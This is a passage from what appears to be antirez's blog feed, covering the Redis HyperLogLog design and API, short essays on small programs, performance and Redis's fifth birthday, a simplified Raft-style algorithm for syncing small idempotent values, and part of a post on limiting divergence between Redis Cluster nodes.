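    index = h & (M - 1)  # 14 bits of the hash pick one of the m subsets
    bits = h >> 14       # the remaining 50 bits are our "coin flips"
    # Length of the run of zero bits, plus one (as in the Redis
    # implementation; see the linear counting discussion below).
    run = 1
    while bits & 1 == 0 and run <= 50:
        run += 1
        bits >>= 1
    registers[index] = max(registers[index], run)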

The Redis implementation
===

The standard error of HyperLogLog is 1.04/sqrt(m), where “m” is the number of registers used.
Redis uses 16384 registers, so the standard error is 0.81%.

Since the hash function used in the Redis implementation has a 64 bit output, and we use 14 bits of the hash output in order to address our 16k registers, we are left with 50 bits, so the longest run of zeroes we can encounter will fit a 6 bit register. This is why a Redis HyperLogLog value only uses 12k bytes for 16k registers.

Because of the use of a 64 bit output function, which is one of the modifications of the algorithm that Google presented in [2], there are no practical limits to the cardinality of the sets we can count. Moreover, it is worth noting that the error for very small cardinalities tends to be very small. The following graph shows a run of the algorithm against two different large sets. The cardinality of the set is shown on the x axis, while the relative error (in percentage) is on the y axis.

img://antirez.com/misc/hll_1.png

The red and green lines are two different runs with two totally unrelated sets. They show how the error is consistent as the cardinality increases. However for much smaller cardinalities, you can enjoy a much smaller error:

img://antirez.com/misc/hll_2.png

The green line shows the error of a single run up to cardinality 100, while the red line is the maximum error found over 100 runs. Up to a cardinality of a few hundred, the algorithm is very likely to make a very small error or to provide the exact answer. This is very valuable when the computed value is shown to a user who can visually check whether the answer is correct.

The source code of the Redis implementation is available at Github:

https://github.com/antirez/redis/blob/unstable/src/hyperloglog.c

The API
===

From the point of view of Redis a HyperLogLog is just a string that happens to be exactly 12k + 8 bytes in length
(12296 bytes to be precise). All the HyperLogLog commands will happily run if called with a string value of exactly this size, and will report an error otherwise. However all the calls are safe whatever is stored in the string: you can store garbage and still ask for an estimation of the cardinality. In no case will this make the server crash.

Also everything in the representation is endian neutral and is not affected by the processor word size, so a 32 bit big endian processor can read the HLL of a 64 bit little endian processor.

The fact that HyperLogLogs are strings avoided the introduction of an actual type at the RDB level. This allows the work to be back-ported into Redis 2.8 in the coming days, so you’ll be able to use HyperLogLogs ASAP. Moreover the format is automatically serialized, and can be retrieved and restored easily.

The API consists of three new commands:

PFADD var element element … element
PFCOUNT var
PFMERGE dst src src src … src

The commands prefix is “PF” in honor of Philippe Flajolet [4].

[4] http://en.wikipedia.org/wiki/Philippe_Flajolet

PFADD adds elements to the HLL stored at “var”. If the variable does not exist, an empty HLL is automatically created, as always happens with Redis API calls. The command is variadic, so it allows for very aggressive pipelining and mass insertion.

The command returns 1 if the underlying HyperLogLog was modified, otherwise 0 is returned.
This is interesting for the user since, as we add elements, the probability of an element actually modifying some register decreases. The fact that the API is able to hint that a new cardinality is available allows for programs that continuously add elements and retrieve the approximated cardinality only when a new one is available.

PFCOUNT returns the estimated cardinality, which is zero if the key does not exist.

Finally, PFMERGE can merge N different HLL values into one. The resulting HLL will report an estimated cardinality that is the cardinality of the union of the different sets counted by the different HLL values.
This seems magical but works because HLL, while randomized, is fully deterministic, so PFMERGE just takes, for every register, the maximum value available across the N HLL values. A given element always hashes to the same register with the same run of zeroes, so the merge performed in this way only adds the count of the elements that are not common to the different HLLs.

As you can see HyperLogLog is fully parallelizable, since it is possible to split a set into N subsets, count them independently, and later merge the values to obtain the approximation of the total cardinality. The fact that HLLs in Redis are just strings makes it easy to move HLL values across instances.
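
A quick usage example of the three commands with the redis-py client (an assumption; the key names are made up):

import redis  # assuming the redis-py client

r = redis.Redis()

r.pfadd("hll:today", "1.2.3.4", "5.6.7.8", "1.2.3.4")
print(r.pfcount("hll:today"))     # ~2: the duplicate is not counted

r.pfadd("hll:yesterday", "5.6.7.8", "9.9.9.9")
r.pfmerge("hll:union", "hll:today", "hll:yesterday")
print(r.pfcount("hll:union"))     # ~3: estimate of the union's cardinality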

First make it correct, then make it fast
===

Redis HLLs are composed of 16k registers packed as 6 bit integers. This creates several performance issues that must be solved in order to provide an API of commands that can be called without thinking too much.

One problem is that accessing a register requires reading multiple bytes, shifting, and masking in order to retrieve the correct 6 bit value. This is not a big problem for PFADD, which only touches one register per element, but PFCOUNT needs to perform a computation using all the 16k registers, so if there are non-trivial constant costs to access every single register, the command risks being slow. Moreover, while accessing the registers, we need to compute the sum of pow(2,-register), which involves floating point math.
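
To see what a single register access involves, here is a sketch in Python (the bit layout is illustrative, not Redis' exact one):

def get_register(buf, i):
    # Read the i-th 6-bit register out of a byte buffer.
    bit = i * 6
    byte, shift = bit // 8, bit % 8
    word = buf[byte]
    if byte + 1 < len(buf):        # a register may span two bytes
        word |= buf[byte + 1] << 8
    return (word >> shift) & 0x3F  # keep 6 bits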

One may feel tempted to use full bytes instead of 6 bit integers in order to speed up the computation, however this would be a shame, since every HLL would use 16k instead of 12k bytes, a non trivial difference, so this route was discarded from the beginning. The command was optimized for a speedup of about 3x over the initial implementation with the following changes:

* For m=16k, which is the Redis default (the implementation is more generic and could theoretically work with different values), the implementation selects a fast path with unrolled loops accessing 16 registers at a time. The registers are accessed using fixed offsets / shifts / masks (via a pointer that is incremented by 12 bytes at each iteration).
* The floating point computation was modified to allow multiple operations to be performed in parallel where possible. This was just a matter of adding parens. Floating point addition is not associative, but in this case there was no loss of precision.
* The pow(2,-register) term was precomputed in a lookup table.

With the 3x speedup provided by the above changes, the command was able to perform about 60k calls per second on fast hardware. However this is still far from the hundreds of thousands of calls per second possible with commands that are, from the user's point of view, conceptually similar, like SCARD.

Instead of optimizing the computation of the approximated cardinality further, there was a simpler solution. Basically the output of the algorithm only changes if some register changes. However, as already observed above, most PFADD calls don’t result in any register being changed. This means it is possible to cache the last output and recompute it only when some register changes.

So our data structure has an additional tail of 8 bytes representing a 64 bit unsigned integer in little endian format. If the most significant bit is set, the precomputed value is stale and needs to be recomputed, otherwise PFCOUNT can use it as is. PFADD just turns on the “cache invalid” bit when some register is modified.
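
Decoding that tail would look something like this (a sketch of the layout just described, not code from the Redis source):

def cached_cardinality(tail8):
    # `tail8` is the 8-byte cache tail: a 64-bit little endian unsigned
    # integer whose most significant bit flags a stale value.
    value = int.from_bytes(tail8, "little")
    if value & (1 << 63):
        return None  # stale: PFCOUNT has to recompute the estimate
    return value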

After this change, even when adding elements at maximum speed using a pipeline of 32 commands with 50 simultaneous clients, PFCOUNT was able to perform as well as any other O(1) command with very small constant times.

Bias correction using polynomial regression
===

The HLL algorithm, in order to be practical, must work equally well in any cardinality range. Unfortunately the raw estimation performed by the algorithm is not very good for cardinalities less than m*2.5 (around 40000 elements for m=16384), since in this range the algorithm outputs biased results, or even results with larger errors, depending on the exact range.

The original HLL paper [1] suggests switching to Linear Counting [5] when the raw cardinality estimated by the first part of the HLL algorithm is less than m*2.5.

[5] http://dblab.kaist.ac.kr/Publication/pdf/ACM90_TODS_v15n2.pdf

Linear counting is a different cardinality estimator based on a simple concept. We have a bitmap of m bits. Every time a new element must be counted, it is hashed, and the hash is used in order to index a random bit inside the bitmap, which is turned to 1. The number of unset bits in the bitmap gives an idea of how many elements we have added so far, using the following formula:

cardinality = m*log(m/ez);

Where ‘ez’ is the number of zero bits and m is the total number of bits in the bitmap.
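
In code, the estimator is a one-liner (a direct transcription of the formula above, nothing Redis specific):

import math

def linear_counting(m, ez):
    # m: total number of bits in the bitmap; ez: bits still at zero.
    return m * math.log(m / ez)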

Linear counting does not work well for large cardinalities compared to HyperLogLog, but works very well for small cardinalities. Since the HLL registers, as a side effect, also work as a linear counting bitmap, by counting the number of zero registers it is possible to apply linear counting in the range where HLL does not perform well. Note that this is possible because when we update the registers we don’t really store the longest run of zeroes, but the longest run of zeroes plus one. This means that when an element addresses a register that was never addressed before, the register turns from 0 to a different value (at least 1).

The problem with linear counting is that as the cardinality gets bigger, its output error gets larger, so we need to switch to HLL ASAP. However when we switch at 2.5m, HLL is still biased. In the following image the same cardinality was tested with 1000 different sets, and the error of each run is reported as a point:

img://antirez.com/misc/hll_3.png

The blue line is the average error. As you can see, before a cardinality of 40k, where linear counting is used, the “beam” of points gets larger (bigger errors) as we move towards greater cardinalities. When we switch to the raw HLL estimate the error is smaller, but there is a bias: the algorithm overestimates the cardinality in the range 40k-80k.

Google engineers studied this problem extensively [2] in order to correct the bias. Their solution was to create an empirical table of cardinality values and the corresponding biases. Their modified algorithm uses the table and interpolation in order to get the bias in a given range, and correct accordingly.

I used a different approach: you can see that the bias is not random but looks like a very smooth curve, so I calculated a few cardinality-bias samples and performed polynomial regression in order to find a polynomial approximating the curve.

Currently I’m using a fourth-order polynomial to correct in the range 40960-72000, and the following is the result after the bias correction:

img://antirez.com/misc/hll_4.png

While there is still some bias at the switching point between the two algorithms, the result is quite satisfying compared to the vanilla HLL algorithm; however it is probably possible to use a curve that better fits the bias curve. I had no time to investigate this further.

It is worth noting that during my investigation I found that, when no bias correction is used, and at least for m=16384, the best point to switch from linear counting to the raw HLL estimate is actually near 3m and not 2.5m as mentioned in [1], since switching at 3 improves both bias and error. Values larger than 3 will improve the bias (a value of 4 completely corrects it) but have bad effects on the error.

The original HLL algorithm also corrects for values towards 2^32 [1][2], since once we approach very large values, collisions in the hash function start to be an issue. We don’t need such a correction since we use a 64 bit hash function and 6 bit counters, which is one of the modifications proposed by Google engineers [2] and adopted by the Redis implementation.

Future work
===

Intuitively it seems possible to improve the error of the algorithm's output when linear counting is used, by exploiting the additional information we have. In the standard linear counting algorithm the registers are just 1 bit wide, so we only know whether an element hashed to a given bit or not. Still, the HLL algorithm as proposed initially [1] and as modified at Google [2], when reverting to linear counting, only uses the number of zero registers as input. It is possible that also using the information stored in the registers could improve the output.

For example in standard linear counting, assuming we have 10 bits, I may add 5 elements that all happen to address the same bit. This is an odd case that the algorithm has no way to correct, and the estimation provided will likely be smaller than the actual cardinality. However, in the linear counting variant used by HLL, in a similar situation we may find that the value of the only register set hints at multiple elements colliding there, allowing a correction of the output.

Conclusion
===

HyperLogLog is an amazing data structure. My hope is that the Redis implementation, which will be available in a stable release in a matter of days (Redis 2.8.9 will include it), will provide this tool to many programmers in a ready to use form.

The HN post is here: https://news.ycombinator.com/item?id=7506774
http://antirez.com/news/75
Fascinating little programs http://antirez.com/news/74 http://antirez.com/news/74 Thu, 13 Mar 2014 22:32:59 +0000 I was trying to merge a few pull requests, fix issues, and do some refactoring at the same time. It was some kind of nirvana I was feeling: complete control of small, self-contained, and useful code.

There is something special in simple code. Here I’m not referring to simplicity as a way to fight complexity or over-engineering, but to simplicity per se, self-referential, with no goals other than beauty, understandability and elegance.

After all, the programming world has always been fascinated with small programs. For decades programmers have competed in 1k or 4k contests, from 6502 assembler to today’s javascript contests.
Even the obfuscated C contest, after all, has a big minimalism component.

Why is it so great to hack on a small piece of code? Yes, it is small and simple: those are two good points. It can be totally understood, dominated. You can use smartness, since little code is the only place in the world where coding smartness pays off; in large projects obviousness is far better in the long run. However I believe there is more to it than that: small programs can be perfect. As perfect as a sonnet composed of a few words. The limits in size and scope constitute an intellectual stratagem to avoid the “it may be better” trap, when this “better” is not actually measurable and evident. Under these strict limits, what the program does is far more interesting than what it does not. Actually the constraints are the most fertile ground for creative solutions, which would otherwise likely be useless: at scale there is always a more correct, understood, canonical way to do everything.

There is an interview with Bill Gates from the first years of Microsoft where he describes this feeling about writing the famous Microsoft BASIC interpreter. The limits were the same ones we impose on ourselves today for fun, in contests, or just for the sake of it. There was a generation of programmers able to experience perfection in their creations, where it was obvious to measure and understand whether a change actually led to an improvement of the program or not, in a territory where space and time were so scarce. There was no room for waste and unneeded complexity.

Today’s software is in some way the triumph of the other reality of software: layers of complexity that gave us incredible devices and infrastructure technologies, which in the hands of non-experts unlock a number of possibilities. However maybe there is still something to preserve from the ancient times when software could be perfect: the feeling that what you are creating has a structure and is not just a pile of code that works. If you zoom out enough, you’ll see your large program is actually quite small again, and at least at this scale it should resemble perfection, or at least aim at it.
http://antirez.com/news/74
What is performance? http://antirez.com/news/73 http://antirez.com/news/73 Fri, 28 Feb 2014 13:30:42 +0000
A good starting point is probably the first slide I’ve been using lately in my talks about Redis. This first slide is indeed about performance, and says that performance is mainly three different things.

1) Latency: the amount of time I need to get the reply for a query.

2) Operations per unit of time per core: how many queries (operations) is the system able to serve per second, on a given reference computational unit?

3) Quality of operations: how much work those operations are able to accomplish?

Latency


This is probably the simplest component of performance. In many applications it is desirable that the time needed to get a reply from the system is small. However while the average time is important, another concern is the predictability of the latency figure, and how much difference there is between the average case and the worst case. When used well, in-memory systems are able to provide very good latency characteristics, and are also able to provide a consistent latency over time.

Operations per second per core


The second component I’m enumerating is what makes the difference between raw performance and scalability. We are interested in the amount of work the system is able to do in a given unit of time, on a given reference computational unit. Linearly scalable systems can reach a big number of operations per second by using many nodes, but this means they are scalable, not necessarily performant.

Operations per second per core is also usually tied to the number of queries you can perform per watt, that is, to the energy efficiency of the system.

Quality of operations


The last point, while probably not as stressed among developers as throughput and latency, is really important in certain kinds of systems, especially in-memory systems.

A system that is able to perform 100 operations per second, but with operations of “poor quality” (for example just GET and SET, in Redis terms), has lower performance than a system that is also able to perform an INCR operation with the same latency and OPS characteristics.
For instance, if the problem at hand is to increment counters, the former system will require two operations to increment a counter (we are not considering race conditions in this context), while the system providing INCR is able to use a single operation. As a result it is actually able to provide twice the performance of the former system.
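
In redis-py terms (an assumption, with a made-up key name), the difference looks like this:

import redis  # assuming the redis-py client

r = redis.Redis()

# With only GET and SET available: two round trips, plus a race window
# between the read and the write.
value = int(r.get("counter") or 0)
r.set("counter", value + 1)

# With the higher "quality" INCR operation: one atomic round trip.
r.incr("counter")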

As you can see the quality of operations is not an absolute meter, but depends on the kind of problem to solve. If instead we want to cache HTML fragments, the same two systems are equivalent, since the INCR operation would be useless.

The quality of operations is particularly important in in-memory systems, since usually the computation itself is negligible compared to the time needed to receive and dispatch the command and to create a reply, so systems like Redis, with a rich set of operations, are able to provide better performance in many contexts almost for free, just by allowing the user to do more with a single operation. The “do more” part can actually mean a lot of things: either providing a reply to a more complex question, like for example the ZRANK command of Redis, or simply providing a more *selective* reply, like the HMGET command, which returns just a subset of the fields composing a Hash value, reducing the amount of bandwidth required between the server and its clients.

In general, quality of operations does not only affect performance by giving more or less value to the operations per second the system is able to perform: operation quality also directly affects latency, since more complex operations avoid the back and forth data transfers between clients and servers required to assemble multiple simpler operations into a more complex computation.

Conclusion


I hope this short exploration of what performance is uncovered some of the complexities involved in evaluating the capabilities of a database system from this point of view. There is a lot more to say about it, but I find that the above three components of performance are among the most interesting and important, both when evaluating a system and when trying to understand how to evolve an existing system to improve its performance characteristics.

Thanks to Yiftach Shoolman for feedback about this topic.
http://antirez.com/news/73
Happy birthday Redis! http://antirez.com/news/72 http://antirez.com/news/72 Wed, 26 Feb 2014 09:19:41 +0000
I’m a bit shocked I worked for five years straight on the same thing. The opportunities for learning new things I had because of the directions Redis pushed me in, and the opportunities to learn new things that I missed because I had almost consistently no time for random hacking, are huge.

My feeling today is that the Redis project was possible because of the great coders I encountered in my journey: they made Redis popular by adopting it in its infancy, since great coders don’t follow the hype. Great coders provided outstanding additions to Redis in the form of patches and ideas able to overcome my instinct to be conservative about extending the system or accepting external contributions. More great coders made it possible to sponsor Redis when it was in its infancy, recognizing that there was something interesting about it, and more great coders applied it the right way to solve problems over the course of many years, wrote an incredible ecosystem of client libraries and tools, and helped other coders apply it when it was not clear what the best way to solve a given problem was.

The Redis community is outstanding because in some way it managed to attract a number of great coders.

I learned that in the future, whether I’ll do more coding or be part of a team building something great in a different role, my top priority will be to stay with great coders. And I learned that they are not easy to recognize at first: their abilities don’t correlate with the number of followers on Twitter nor with the number of Github repositories. You have to discover great coders one after the other, and the biggest gift Redis gave me was to be exposed to many of them.

In the course of five years there was also time, for me, to evolve my idea of what Redis is. The idea I have of Redis today is that its contribution should be to explore corner designs and bizarre ideas. After all, there are large teams of people much smarter than me working on the hard problems with the best technologies available.

Redis will continue to be a small research effort into the more obscure places of the design space. After all I have the feeling that it helped to popularize certain non obvious ideas, like using data structures as the data model of key value stores and caches, or that it is possible to apply scripting to database systems in a different way than stored procedures.

However for Redis to be able to do this research, I should be ready to be opinionated and change development direction when something is weak. This was done in the past, deprecating swap and diskstore, but it should be done even more in the future.

Moreover Redis should be able to pursue different goals at the same time: once Redis 3.0 is stable, the design of Redis Cluster is conceived in order to leave my hands free about changes in the data model, without too many limits or compromises. This will result in a Redis 3.2 release that will focus again on the API, stressing some of the initial and fundamental aspects of Redis: caching, data model and computation.

It is not at all obvious to me, after five years, to find the Redis journey still ongoing, and I’m happy about it, because my motivations are not investors or shares, nor am I particularly in love with Redis as a project. If something new appears tomorrow that marginalizes Redis and makes it totally useless I’ll be very happy to start some new gig, after all this is how technology works: in cycles. And, after all, starting from scratch with something new is always exciting. However currently I believe there is more to do about Redis, and I’ll be happy to continue my work on it in the next weeks.

[1] https://news.ycombinator.com/item?id=494649 Comments]]>
http://antirez.com/news/72
A simple distributed algorithm for small idempotent information http://antirez.com/news/71 http://antirez.com/news/71 Fri, 21 Feb 2014 11:40:01 +0000 The algorithm is useful when you need to keep some kind of information synchronized among a number of processes.
The information can be anything, as long as it is composed of a small number of bytes, and as long as it is idempotent, that is, the current value of the information does not depend on the previous value, and we can just replace an old value with the new one.

The size of the information is important because of the way the algorithm works: the information should be small enough that every node can broadcast it from time to time to some other random node, so it should fit the size of a “heartbeat” packet. Let’s say that up to a few kbytes everything is fine.

This algorithm is not new in any way, it is basically just a trivial way to put together obvious ideas found in other distributed algorithms. However the algorithm is very useful in many real-world contexts, and is extremely simple to implement. The algorithm is mostly borrowed from Raft, however because of the premises it uses only a subset of Raft that is trivial to implement.

An example scenario
===

To understand the algorithm better, it is useful to have an example of a problem that we want to solve in our distributed system.
Let’s say that we have N processes connected with two kinds of wifi networks: a very reliable but slow wireless network, that is only suitable to send “control” packets like heartbeats or other low bandwidth data, and a very fast wireless network.

Now let’s imagine that while the slow network works at a fixed frequency, the high speed wireless network needs to adapt to changing conditions and noise on a given frequency, and is able to hop to a different frequency as soon as too much noise is detected.

We need a way to make sure that all the processes use the same frequency to communicate with the high speed network, and we also need a way to switch frequency when the currently used frequency has issues. We need this system to work if there are network partitions in the slow network, as long as the majority of the processes are able to communicate.

Note that this problem has the properties stated above:

1) The information is idempotent: if the high speed network switched to a different frequency, the new frequency does not depend on the old frequency. A process receiving the new frequency can just update its own, regardless of whether its old frequency was the latest one or an older one (because for some reason it did not receive some update).

2) The information is small, it is possible to propagate it easily across nodes in a small data packet. In this case it is actually extremely small, for example the frequency may be encoded in a 64 bit integer.

Epochs and update messages
===

The basic idea of this algorithm is that there is an artificial notion of time across the processes, that is used to order events or information without resorting to the system time of the processes, which is hard to synchronize between them.
This artificial time is called the “epoch”. Every process has the notion of a currentEpoch, that is initialized to zero at startup.
Every time a process sees an epoch that is greater than its current epoch, it updates its epoch to match the observed epoch.

Every process also has the notion of a frequencyEpoch, that is, the version of the currently used frequency.

In order to propagate the information, every process periodically sends an update message to some other process. For example every 5 seconds every process picks a random process, and sends it an update message containing: the current frequency in use, the epoch of the frequency, and the currentEpoch of the process sending the update message.

The first time a process is created its frequency is set to -1: this means that there is no frequency currently in use from the point of view of that process, and that another one must be picked.

Updating the frequency
===

When a process receives an update message from another process containing a frequency with a frequencyEpoch that is greater than its local frequencyEpoch, it updates its frequency to the received value, and sets its frequencyEpoch to the received value as well.

In general when the currentEpoch or the frequency and frequencyEpoch are modified, the process writes the change to disk or other permanent storage, so that when the process is restarted it will use the latest known information.
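
To make the description so far more concrete, this is a minimal Python sketch of the per-process state and the UPDATE handling (class and method names are mine, invented for illustration; persistence and networking are reduced to comments):

import json

class Process:
    def __init__(self, peers):
        self.peers = peers            # addresses of the other processes
        self.current_epoch = 0        # the artificial "epoch" time
        self.frequency = -1           # -1 = no frequency picked yet
        self.frequency_epoch = 0      # version of the current frequency

    def update_message(self):
        # Sent every few seconds to a random peer over the slow network.
        return json.dumps({"freq": self.frequency,
                           "freq_epoch": self.frequency_epoch,
                           "epoch": self.current_epoch})

    def handle_update(self, raw):
        m = json.loads(raw)
        # Any greater epoch observed updates our currentEpoch.
        if m["epoch"] > self.current_epoch:
            self.current_epoch = m["epoch"]          # persist to disk here
        # A greater frequencyEpoch carries fresher information.
        if m["freq_epoch"] > self.frequency_epoch:
            self.frequency = m["freq"]
            self.frequency_epoch = m["freq_epoch"]   # persist to disk here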

Choosing a frequency
===

A process needs to choose a frequency in two different scenarios:

1) When the current frequency is detected to be noisy.
2) When the current frequency is set to -1 (at startup).

In order to choose a frequency, a process needs to win an election.

This is how it works:

1) The process increments its own currentEpoch, and writes it to permanent storage. It also selects a suitable new frequency.

2) The process sends an ELECT_ME packet to all the other processes to get their vote. The ELECT_ME packet contains the currentEpoch of the sending process.

3) The other processes will reply with a YOU_HAVE_MY_VOTE packet only if their currentEpoch is not greater than the one of the process requesting the vote (it can’t be smaller, since the reception of the ELECT_ME packet will cause an older currentEpoch to be updated to match the one of the incoming packet). The YOU_HAVE_MY_VOTE packet contains the currentEpoch of the voting process.

4) A given process only votes a single time for a given epoch, so it keeps a variable called lastVoteEpoch, and will only provide its vote if the currentEpoch in the request for the vote is greater (>) than lastVoteEpoch. When the vote is provided, lastVoteEpoch is updated (and stored on disk *before* the vote is provided, so that a crash and restart will not cause this process to vote again for the same epoch).

5) YOU_HAVE_MY_VOTE messages with a currentEpoch smaller than the currentEpoch of the process that requested the vote are discarded.

6) The process requesting the vote will consider itself elected only if it receives the majority of the votes from the other processes (it counts itself as a voter and votes for itself when the election starts). If the process is elected it will update its frequencyEpoch and frequency variables. The frequencyEpoch that will be used is the epoch the process requested the vote with, that is, its currentEpoch at the time it sent the ELECT_ME packets, just after the increment.

Given that a process needs to be elected to change the frequency, and that every process votes a single time in a given epoch, there can only be a single winner for a given epoch.

If a given process is not able to get elected because the majority is not reached, it will try again after a random delay. This delay must be greater than the latency of the slow network that is used to exchange these messages (see the Raft paper for more information about this). Every process will consider the election aborted after some time that is smaller than the retry time.
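
The election procedure can be sketched by extending the Process class of the previous snippet (again, all names are invented; broadcast() and reply() are placeholders for sending packets over the slow network):

def broadcast(msg): pass   # placeholder: send msg to every peer
def reply(msg): pass       # placeholder: answer the sender of the packet

class ElectingProcess(Process):
    def __init__(self, peers):
        super().__init__(peers)
        self.last_vote_epoch = 0       # persisted *before* any vote is sent

    def start_election(self, new_frequency):
        self.current_epoch += 1        # persist to disk before proceeding
        self.election_epoch = self.current_epoch
        self.proposed_freq = new_frequency
        self.votes = 1                 # we vote for ourselves
        broadcast({"type": "ELECT_ME", "epoch": self.current_epoch})

    def handle_elect_me(self, m):
        if m["epoch"] > self.current_epoch:
            self.current_epoch = m["epoch"]          # persist to disk here
        # Vote only once per epoch, and only for a non-stale requester.
        if m["epoch"] == self.current_epoch and m["epoch"] > self.last_vote_epoch:
            self.last_vote_epoch = m["epoch"]        # persist *before* replying
            reply({"type": "YOU_HAVE_MY_VOTE", "epoch": self.current_epoch})

    def handle_vote(self, m):
        if m["epoch"] != self.election_epoch:
            return                     # vote for an old election: discard
        self.votes += 1
        if self.votes > (len(self.peers) + 1) // 2:  # majority reached
            self.frequency = self.proposed_freq      # election won
            self.frequency_epoch = self.election_epoch  # persist to disk here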

Propagating the new information
===

When a process wins an election, it updates its frequency and frequencyEpoch to the new values, so by sending UPDATE messages, eventually all the other processes will receive the update as well and will switch to the new frequency.

If some process is partitioned away, it will receive the update as soon as the partition heals.

However it is a good idea for a process to broadcast an UPDATE message to all the other processes as soon as it changes frequency, so that all the other nodes will switch ASAP.

Improving the algorithm with a simple change
===

The ELECT_ME packet can be improved by adding the value of the frequencyEpoch, so that other processes will refuse to vote if the requesting process has stale information. This may happen when, for example, the process was partitioned away for some time with an old frequency that does not work well because there is too much noise. So in a minority partition, it may try to get elected again and again, while the majority probably already switched to a newer frequency.

When the partition heals, the process may get elected and change the frequency to something else before having the chance to receive the updated frequency, causing a useless frequency switch. By adding the frequencyEpoch to the ELECT_ME packet, and by making the other processes check that this info is up to date before providing their vote, we avoid this problem.

Other improvements
===

Another improvement may be to only provide the vote if the current frequency, from the point of view of the receiving node, is *really* noisy. This prevents a single node with hardware issues in the high bandwidth radio from continuously switching to new frequencies, since it will detect every frequency as noisy. This way a frequency switch can happen only if the majority of the nodes are detecting an issue with the current frequency.

Similarly the node sending ELECT_ME messages to get elected may include the frequency it wants to switch to, and the receiving nodes may vote only if the selected frequency passes some test and is considered a good pick. However this may affect the liveness of the algorithm: different nodes may believe that different frequencies are not a good pick, so that a majority can’t be reached.

Conclusions
===

What I did in this blog post is just to take Raft, that is able to handle the complex problem of replicating a state machine across different processes in a consistent way, and simplify it in order to use it for a subset of problems where the state is a single value (or a set of values) that can just be updated in an idempotent way.

The resulting algorithm is trivial to implement in a robust way, and is good enough for a non trivial set of real world problems.

---------------------------------------

EDIT: I received some feedback via Twitter, and I think it is better to clarify the point of the above algorithm. The idea is to retain some safety under the specified scenario, where a replicated state machine is not needed, but where we still want a reasonable way to keep a set of values synchronized across different processes. The goal is to provide, in exchange for the lack of functionality compared to Raft or Paxos, an algorithm that can be recalled from memory without even reading a document. In this spirit my aim is to further simplify the above description of the algorithm without impacting the functionality.

Moreover, as somebody that is trying to understand more about distributed programming, I see that as a normal programmer it is very easy to get involved in something that is a distributed system without even being aware of it (given that everything is networked today), so descriptions of trivial algorithms may be a way to get somewhat exposed to basic distributed concepts.

The next step is to learn a formal analysis tool and try to analyze the algorithm to provide a proof of safety / liveness. Comments]]>
http://antirez.com/news/71
Redis Cluster and limiting divergences. http://antirez.com/news/70 http://antirez.com/news/70 Mon, 20 Jan 2014 16:13:56 +0000
I believe that putting in perspective the simple ideas that Redis Cluster implements, in a more formal way, is an interesting exercise for the following reason: Redis Cluster is not a design that tries to achieve “AP” or “CP” of the CAP theorem, since for its goals CAP Availability and CAP Consistency are goals too hard to reach without sacrificing other practical qualities.

Once a design does not try to maximize what is theoretically possible, the design space becomes much larger, and the implementation main goal is to try to provide some Availability and some reasonable form of Consistency, in the face of other conflicting design requirements like asynchronous replication of data.

The goal of this article is to reply to the following question: how does Redis Cluster, as an asynchronous system, try to limit divergences between nodes?

Nodes divergence
===

One of the main problems with asynchronous systems is that a master accepting requests never actually knows in a given moment if it is still the authoritative master or a stale one. For example imagine a cluster of three nodes A, B, C, with one replica each, A1, B1, C1. When a master is partitioned away with some client, A1 may be elected on the other side as the new master, but A is not able, for every request processed, to verify with the other nodes if the request should be accepted or not. At best node A can get asynchronous acknowledges from its replicas.

Every time this happens, two parallel time lines for the same set of data are created, one in A, and one in A1. In Redis Cluster there is no way to merge data as explained in [2], so you can imagine the merge function between the A and A1 data sets when the partition heals as just picking one time line among all the time lines created (two in this case).

Another case that creates different time lines is the replication process itself.

A master A may have three replicas A1, A2, A3. Because of the very concept of asynchronous replication, each of the slaves may represent a point in the past history of the time line of A. Usually, since replication in Redis is very fast and has minimal delay, as data is transmitted to slaves at the same time as the reply is transmitted to the writing client, the time “delta” between A and the slaves is small. However slaves may be lagging for some reason, so it is possible that, for example, A1 is one second in the past.

Asynchronously replicated nodes can’t really avoid diverging, however there is no need for the divergence between replicas to be unbound. Actually systems allowing replicas to diverge in an uncontrolled way may be hard to use in practice, even for use cases not requiring strong consistency, that are the target of Redis Cluster.

Putting bounds to divergence
===

Redis Cluster uses a few heuristics in order to limit the divergence of nodes. The algorithms employed are very simple, consisting merely of the following four rules that nodes follow.

1) When a master is isolated from the majority for node-timeout (that is the user configured time after which a non-responding node is considered to be failing by the failure detection algorithm), it stops accepting queries from clients. It is easy to see how this helps in practice: in the majority side of the cluster, no slave is able to get elected and replace the master before node-timeout has elapsed. However, after node-timeout has elapsed, the isolated master knows that it is possible that a parallel history was created in the other side of the cluster, and that this history will win over its own history, so it stops accepting data that would otherwise be lost. This means that if a master is partitioned away together with one or more clients, the window for data loss is node-timeout, which is usually in the order of 500 — 1000 milliseconds. If the partition heals before node-timeout, no data loss happens as the master rejoins the cluster as master.

2) A related problem is, when a master is failing, how to pick the “best” history among the available histories for the same data (depending on the number of slaves). An algorithm is used in order to give an advantage to the slave with the most updated replication offset, that is, the slave that likely has the most recent data compared to the master that went down. However if the best slave fails to get elected the other slaves will try an election as well.

3) If you think about “2” you’ll see that it actually means that the divergence between a master and its slaves is unbound. A slave can be lagging for hours in theory. So there is another heuristic in use, consisting in slaves refusing to try to get elected at all if the last time they received data from the master is too far in the past. This maximum time is currently set to ten times node-timeout, however it will be user-configurable in the stable release of Redis Cluster. While usually the lag between master and slaves is in the sub-millisecond figure, this time limit ensures that the worst case scenario is the following:

- A slave is stopped/unavailable for just a little less than ten times node-timeout.
- Its master fails.
- At the same time the slave returns back available.

Rejoins went wrong
===

There is another failure mode worth covering in Redis Cluster, as it is in some way a different instance of the same problems covered so far. What happens if a master rejoins the cluster after it was already failed over, and there are still clients with a non updated configuration writing to it?

This may happen in two main ways: rejoining the majority after a partition, and restarting the process. The failure mode is conceptually the same: the master is not able to get a synchronous acknowledge from other replicas about every write, and the other nodes may take a few milliseconds before being able to reconfigure a node that just rejoined (the node is usually reconfigured with an UPDATE message as soon as it is detected to have a stale configuration: this usually happens immediately once the rejoining instance pings another node or sends a pong in reply to a ping).

Rejoins are handled with another heuristic:

4) When a node rejoins the majority, or is restarted, it waits a small time (but still a few orders of magnitude bigger than the usual network latency) before accepting writes again, in order to maximize the probability of getting reconfigured before accepting writes from clients with stale information.

History re-play
===

Some of the Redis data structures and operations are commutative. Obvious examples are INCR and SADD: the order of operations does not matter, and eventually the Set or the counter will have the same exact value as long as all the operations are executed.
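
For example, with a hypothetical client (redis-py here, against a local instance; key names are invented) it is easy to see that applying the same SADD operations in a different order converges to the same Set:

import redis

r = redis.Redis()  # assumes a Redis server running on localhost

# The same SADD operations applied in two different orders...
for member in ("a", "b", "c"):
    r.sadd("set:1", member)
for member in ("c", "a", "b"):
    r.sadd("set:2", member)

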